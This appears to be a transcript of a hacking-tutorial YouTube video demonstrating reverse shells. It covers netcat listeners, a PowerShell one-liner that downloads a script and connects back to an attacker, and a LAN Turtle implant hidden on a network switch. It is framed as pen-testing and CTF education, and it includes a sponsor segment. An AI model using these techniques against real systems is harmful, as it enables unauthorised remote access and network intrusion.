let's try it we're already there we just got to hit enter a few times let's try to type in some commands like who am i oh i'm network chuck um let's ls oh we can see what's inside there let's do you name a we can see what the system's about so we we're in there we have control we successfully have a reverse shell that's awesome right but you might be wondering this how do we get our target machine to enter this command to try and connect to us well in a lot of cases this command we have the nmap or the netcat command it could be contained within a script that we somehow get installed on that machine using other hacking methods maybe it's a phishing email they open it and it's just automatically added to their machine and it runs automatically these are often referred to as payloads and it may not be as simple as like an nc or netcat command it might be something crazy using metasploit or interpreter or all kinds of stuff but that's the gist you would somehow get something on that computer to remotely connect to you using a script like this and in case you're wondering this is a basic form of what's called a rat or a remote administration tool it's what hackers use to gain remote access to their victims so your grandma checking her email she clicks on that link it downloads something that script could be a rat that is making an outbound connection through her firewall and the firewall's like cool yeah you're you're leaving you're good you're fine connect to the attacker we don't know it's an attacker but the rat does that's how these things happen let me ask you a question how do you know if your grandma doesn't already have a rat on her computer actually shoot how do you know you don't have a right on your computer or your friends or your family the simple fact is you probably don't know unless you have something monitoring and protecting your computers you're gonna need something like the sponsor of this video bitdefender now i just installed the sucker on my computer look at this three threats already blocked it actually found a malicious file with a junk so if you're looking for a way to protect you and your family from rats and malware and all kinds of crazy stuff and also to find out maybe you already might have one check out bitdefender total security malicious software like worms trojans rootkits spyware ransomware it's got your back it'll find it you can also look at the network traffic of your computer analyze it and go huh that'll look right let's stop that stop it before something bad happens like i don't know maybe an attacker gets a reverse shell to your computer it can do that it'll also help out with spam and phishing attacks all things that plague our families aren't very tech savvy i mean just yesterday actually was that today my wife's like hey can i click on this link is this a fraud it was and she almost clicked on it bitdefender will actually prevent those links from opening from downloading the stuff bad stuff so anyways total security it does all the stuff i mentioned and a lot more if you want to check it out link below if you use my link you do get 120 days of free protection for five devices so give it a try show some love to bitdefender for sponsoring this video and helping me do more of this yeah because it's a dangerous world out there now your grandma probably isn't using linux right she's probably using windows most people use windows as their desktop computer so let's test out doing this on windows which is really kind of scary and really cool so now for scenario two again the attacker's gonna be the same as before we're gonna run the exact same command same story whatever but now our target is gonna be windows this is crazy now for windows we do have a few options you can actually install netcat on windows so that's one way to do it run netcat like we did on linux on windows but i think something even more nefarious is to run something built in all windows systems have something called powershell built into them it's like command line and we can use powershell to connect to us the attacker so let's get our attacking machine set up first now i will say this the command will be the same but just a little bit different because we're attacking windows i'll show you and this is actually fantastic um this is a github repository you need to check it out i got a link below it's called payloads all the things and um essentially it shows you how to execute all these scripts on all the different platforms you can do it in python ruby powershell that's what we care about right it's really awesome so i know my powershell thing is all the way at the bottom here all the way down here bam fully interactive reverse shell on windows scary let's try it so on the server side this is what we want now i'm not going to copy the whole thing all i want right now is this first bit right before that bracket here what do you call that my brain's melted i don't know what it's called i'm gonna copy all this right here and paste that into my server then i'll put that bracket in there oh i gotta google it now what is that called okay brain unmelted it's called a pipe duh pipe oh my gosh sometimes do you forget crap all the time sometimes that's me and just after the pipe i'm gonna use that same command the ncat command ncat netcat and c-l-v-n-p our port for 87 and then dash s for our source and we'll specify our ip address now all this right here i'm not going to talk about that that's a video for another time just trust me it works trust me blindly so we're going to hit enter and we're going to start listening we're listening now for the window side and it's it's so cool and scary at the same time client side i'm going to copy this right here i'm going to open up a text editor just open up notepad paste that so i can change some information on it really just two things at the end here the ip address that we're going to connect to which will be our attacker and then the port which was port 87. so i'm going to copy all that and launch powershell so to launch powershell on windows just do uh command s search for powershell there she is now yours might be blue mine is black because i changed it i like black and now we're gonna paste our command so it just did something um now i think it worked but what just happened here is that command actually went out and downloaded this powershell script notice it's from github um the uh extension is ps1 that's what you'll see for powershell scripts and it did it so let's go look back at our server and see if things happened it did so this is scary dude check this out here's where we were running our command and we're listening the connection came in and boom we're suddenly in powershell we're suddenly on my computer what what that's nuts if i just type in like no dur i can see all my stuff i mean i i can do anything i want that's crazy right now if you're tracking with me here here's what we did again we set up a listener using netcat we're saying yes we are listening we have our server ready and then using built-in powershell we ran a command that downloaded the script that initiated a connection out to us we listened we heard we accepted the connection and that gave us shell access a reverse shell a reverse power shell into that windows machine that's cool that's awesome now there is a lot more to the world of netcat and creating reverse shells it's a whole thing what i'm hoping is that this what you saw here gives you just that that itch to start just digging deeper and trying it out for yourself again this is a skill that you'll use a lot in cts on try hack me hack the box all those websites and also something you'll use as a professional pen tester or an ethical hacker now there is one more thing i want to show you and that's this guy right here a land turtle this little guy doesn't look like anything really just like a dongle a dongle you might see laying around it's actually a little linux computer isn't that cool it's a linux computer powered via usb has an ethernet port on the other side but lurking underneath the shell the turtle shell here is a ton of hacking tools one hacking tool in particular that we're talking about right here you guessed it man there's netcat on this sucker it's awesome okay cool it's a little linux box it has netcat but how do we use it like this check this out now again this little guy can do so much more than what i'm about to show you but because we're talking about netcat i want to show you netcat this thing can be powered via a little usb power bank so here's the scenario let's say you're pen testing a network and let's say you're on site at the business and you see on the wall over there hey what's that oh it's an ethernet port or maybe you see a switch oh a switch i want to slowly get out my land turtle plug it in plug it into the switch plug it into my usb power bank hide it behind something where people can't see it and then leave you're done go home because yeah buddy you've got remote access to that network so we have our turtle in place of the network and now we need to listen for his connections we're going to run our same command now i'm going to remove all the windows specific stuff just going to keep the nc-lvnp87 all that stuff we're going to start listening now what's cool about this land turtle because i have net cat running on it it's actually got a script that's reaching out to my server constantly as soon as it comes up and boom connection received now i'm going to hide this ip address because it's actually my real home ip address but dude here's a scenario someone snuck into my house on my home network and plugged a freaking turtle into it that turtle because it has a netcat running on it broke through my firewall it connected to to to an attacking pc and now this attacking pc can run any command he wants off of this little linux machine this land turtle like watch we can like run things like nmap we can discover crap ready well i tried who am i didn't work we'll do nmap tick s t and i'll do a subnet or i'll do an ip range and watch what happens now this is crazy right like i'm logged in or i'm reverse shell into this turtle here and it's hidden it's hidden you can't see it and i have access to the network it's connected to that's a little crazy there it goes it finished again this land turtle can do a lot more i am giving away two of these check it out link below it's gonna be a little contest now to enter the contest you will need a secret phrase a secret code the code is going to be given right now it is the network chuck turtle all one word just like the way you see it on the screen you will need that to end of the contest but yeah reverse shells they're kind of crazy right they are a common way that hackers will use to get into a machine to have access to it remotely but anyways that's about it guys let me know what you think of the video in the comments below um did you try this did you have fun let me know do you have any questions do you need help also let us know in the comments below and don't forget i do have a walk through a guide in the description so if you'd like to follow along and want to be able to copy commands and stuff i got it there and of course don't forget to hack that youtube algorithm hit that like button notification bell comment subscribe we gotta hack youtube today but we gotta do it ethically like everything we do yep that's about it i'll catch you guys next time that's cool i'm not drinking that anyways [Music] you

https://www.youtube.com/watch?v=bXCeFPNWjsM
NCAT Videos 38 views · 1:08
The Fibre vs. Satellite Backhaul Business-Case Tool evaluates investment projects by comparing the economics of fibre-optic and ...
https://www.youtube.com/watch?v=Frj0U489nBc
NSR, an Analysys Mason company 475 views · 10:00
Non-GEO Constellations Analysis Toolkit Beam and Satellite IP Throughput calculations, per constellation. 1:19 click to skip ...
https://www.youtube.com/watch?v=vN1wNuZzyT0